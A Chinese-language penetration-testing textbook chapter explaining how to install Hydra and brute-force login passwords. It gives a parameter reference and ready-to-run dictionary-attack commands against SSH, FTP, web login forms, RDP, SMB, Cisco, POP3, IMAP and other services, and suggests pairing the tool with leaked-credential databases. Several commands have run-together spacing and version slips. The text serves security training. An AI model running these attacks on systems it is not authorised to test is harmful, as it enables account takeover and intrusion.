3.2 使用Hydra暴力破解Linux密碼

Hydra是世界頂級的密碼暴力破解工具，支持幾乎所有協議的在線密碼破解，功能強大，密碼能否被破解的關鍵取決于破解字典是否足夠強大。在網絡安全滲透過程中，Hydra是一款必備的測試工具，配合社工庫進行社會工程學攻擊，有時會獲得意想不到的效果。

3.2.1 Hydra簡介

Hydra是著名黑客組織thc開發的一款開源的暴力密碼破解工具，可以在線破解多種密碼，目前已經被Backtrack和Kali等滲透平臺收錄。除了命令行下的Hydra外，還提供了Hydra-GTK版本（有圖形界面的Hydra），其官方網站是http://www.thc.org/thc-hydra。

Hydra 7.6的下載地址為http://www.thc.org/releases/hydra-7.6.tar.gz，它支持AFP、Cisco AAA、Cisco auth、Cisco enable、CVS、Firebird、FTP、uHTTP-FORM-GET、HTTP-FORM-POST、HTTP-GET、HTTP-HEAD、HTTP-PROXY、HTTPS-FORM-GET、HTTPS-FORM-POST、HTTPS-GET、HTTPS-HEAD、HTTP-Proxy、ICQ、IMAP、IRC、LDAP、MS-SQL、MySQL、NCP、NNTP、Oracle Listener、Oracle SID、Oracle、PC-Anywhere、PCNFS、POP3、POSTGRES、RDP、Rexec、Rlogin、RSH、SAP/R3、SIP、SMB、SMTP、SMTP Enum、SNMP、SOCKS5、SSH（v1和v2）、Subversion、Teamspeak（TS2）、Telnet、VMware-Auth、VNC、XMPP等類型密碼的破解。

3.2.2 Hydra的安裝與使用

Hydra可以在Debian和Ubuntu等環境下安裝和使用。

1．在Debian和Ubuntu環境下安裝Hydra

如果是Debian和Ubuntu發行版，會自帶Hydra，可直接使用apt-get在線安裝，命令如下。

        sudo  apt-get  install   libssl-dev  libssh-dev  libidn11-dev  libpcre3-dev
    libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev
    hydra

如果要使用Redhat/Fedora發行版的源碼包編譯安裝，需要先安裝相關依賴包，命令如下。

        yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel
    subversion-devel

2．安裝CentOS

CentOS的安裝命令如下。

        # tar zxvf hydra-7.6-src.tar.gz
        # cd hydra-6.0-src
        # ./configure
        # make
        # make install

3．使用Hydra

BT5和kali都默認安裝了Hydra。在Kali中，依次單擊“Kali Linux”→“Password Attacks”→“Online Attacks”→“Hydra”選項即可打開Hydra。在CentOS終端中，輸入命令“/usr/local/bin/hydra”即可打開該暴力破解工具。除此之外，還可以通過“hydra-wizard.sh”命令進行向導式設置來密碼破解，如圖3-5所示。

圖3-5 使用hydra-wizard.sh進行密碼破解

4．安裝libssh

如果不安裝libssh，在運行Hydra破解賬號時會出現錯誤。如圖3-6所示，顯示錯誤提示信息“[ERROR] Compiled without LIBSSH v0.4.x support, module is not available! ”，在CentOS下運行如下命令即可解決此問題。

圖3-6 libssh模塊缺少錯誤

        yum install cmake
        wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz
    tar zxf libssh-0.4.8.tar.gz
        cd libssh-0.4.8
        mkdir build
        cd build
        cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
    make
    make install
        cd /test/ssh/hydra-7.6   //此為下載Hydar并解壓的目錄
        make clean
        ./configure
        make
        make install

5．Hydra參數詳細說明

Hydra命令示例如下。

        hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE]
    [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET]
    [-SuvV46] [service://server[:PORT][/OPT]]

· -l LOGIN：指定破解的用戶名稱，對特定用戶破解。

· -L FILE：從文件中加載用戶名進行破解。

· -p PASS：小寫字母“p”，指定密碼破解，少用，一般采用密碼字典。

· -P FILE：大寫字母“P”，指定密碼字典。

· -e ns：可選選項，“n”表示空密碼試探，“s”表示使用指定用戶和密碼試探。

· -C FILE：使用冒號分割格式，例如“登錄名：密碼”代替“-L”和“-P”參數。

· -t TASKS：同時運行的連接的線程數，每一臺主機默認為16個線程。

· -M FILE：指定服務器目標列表文件為每行一條。

· -w TIME：設置最大超時時間，單位為秒，默認為30秒。

· -o FILE：指定結果輸出文件。

· -f：使用“-M”參數以后，在找到第一對登錄名或者密碼時中止破解。

· -v/-V：顯示詳細過程。

· -R：繼續上一次破解。

· -S：采用SSL鏈接。

· -s PORT：可通過這個參數指定非默認端口。

· -U：服務模塊使用細節。

· -h：更多的命令行選項（完整的幫助文檔）。

· server：目標服務器名稱或者IP地址（使用此選項或“-M”選項）。

· service：指定服務名，支持的服務和協議包括Telnet、FTP、POP3[-ntlm]、IMAP[-ntlm]、SMB、SMB NT、http[s]-{head|get}、http-{get|post}-form、http-proxy、Cisco、Cisco-Enable、VNC、LDAP2、LDAP3、MSSQL、MySQL、Oracle-Listener、Postgres、NNTP、Socks5、REXEC、Rlogin、PCNFS、SNMP、RSH、CVS、SVN、ICQ、SAPR3、SSH2、SMTP-Auth[-ntlm]、pcAnywhere、TeamSpeak、SIP、Vmauthd、Firebird、NCP、AFP等。

· OPT：一些服務模塊支持額外的輸入（“-U”選項用于獲取模塊的幫助信息）。

3.2.3 Hydra應用實例

1．破解SSH賬號

破解SSH賬號有兩種方式，一種是指定賬號破解，另一種是指定用戶列表破解，命令如下。

        hydra -l用戶名 -p密碼字典 -t線程 -vV -e ns ip ssh

例如，輸入命令“hydra-l root-P pwd2.dic-t 1-vV-e ns 192.168.44.139 ssh”，對IP地址為192.168.44.139的root賬號密碼進行破解，如圖3-7所示，破解成功后顯示其詳細信息。

圖3-7 破解SSH賬號

輸入命令“hydra-l root-P pwd2.dic-t 1-vV-e ns-o save.log 192.168.44.139 ssh”，將掃描結果保存在save.log文件中，使用“cat save.log”命令查看掃描結果，如圖3-8所示。

圖3-8 查看破解日志

2．破解FTP賬號

（1）破解指定密碼

        hydra ip ftp -l用戶名 -P密碼字典 -t線程(默認16) -vV
        hydra ip ftp -l用戶名 -P密碼字典 -e ns -vV

（2）批量破解FTP賬號和密碼

        hydra -L list_user -P list_password 192.168.56.101 ftp -V

對FTP服務器（192.168.56.101）進行密碼破解，如圖3-9所示。

圖3-9 對FTP密碼進行破解

3．GET方式提交，破解Web登錄

        hydra -l用戶名 -p密碼字典 -t線程 -vV -e ns ip http-get /admin/
        hydra -l用戶名 -p密碼字典 -t線程 -vV -e ns -f ip http-get /admin/index.php

4．POST方式提交，破解Web登錄

（1）hydra-l用戶名-P密碼字典-s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"

        hydra   -L   list_user   -P   list_password   192.168.0.115   http-post-form
    "member.php? mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&in
    ajax=1:fastloginfield=username&username=^USER^&password=^PASS^&quickforward=yes&
    handlekey=ls:Login failed" -V

以上示例表示對192.168.0.115進行破解，需要定義登錄的URL，以及設置登錄驗證和錯誤登錄標記，效果如圖3-10所示。

圖3-10 對HTTP進行暴力破解

        member.php? mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes
    &inajax=1
        fastloginfield=username&username=^USER^&password=^PASS^&quickforward=yes&han
    dlekey=ls
        Login failed

（2）對admin密碼進行破解

        hydra -t 3-l admin -P pass.txt -o out.txt -f 192.168.0.115 http-post-form
    "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"

“-t”表示同時線程數為3; “-l”表示用戶名是“admin”，字典為pass.txt，保存為out.txt; “-f”表示破解一個密碼就停止；“192.168.0.115”表示目標IP地址；“http-post-form”表示采用HTTP的POST方式提交表單密碼破解；“<title>”中的內容是錯誤猜解的返回信息提示。

5．破解HTTPS

      hydra -m /index.php -l muts -P pass.txt 192.168.0.115 https

6．破解teamspeak

        hydra -l用戶名 -P密碼字典 -s端口號 -vV ip teamspeak

7．破解Cisco

    hydra -P pass.txt 192.168.0.115 cisco
    hydra -m cloud -P pass.txt 192.168.0.115 cisco-enable

8．破解SMB

    hydra -l administrator -P pass.txt 192.168.0.115 smb

9．破解POP3

    hydra -l muts -P pass.txt my.pop3.mail pop3

10．破解遠程終端賬號

（1）破解管理員賬號

    hydra ip rdp -l administrator -P pass.txt -V

（2）批量破解賬號

    hydra -s 3389192.168.44.138 rdp -L user.txt  -P pwd.txt -V

破解效果如圖3-11所示。

圖3-11 破解3389賬號

11．破解HTTP-Proxy

    hydra -l admin -P pass.txt http-proxy://192.168.0.115

12．破解IMAP

    hydra -L user.txt -p secret 192.168.0.115 imap PLAIN
    hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

參考文章

· http://resources.infosecinstitute.com/online-dictionary-attack-with-hydra/

· http://www.aldeid.com/wiki/Thc-hydra#Install_Hydra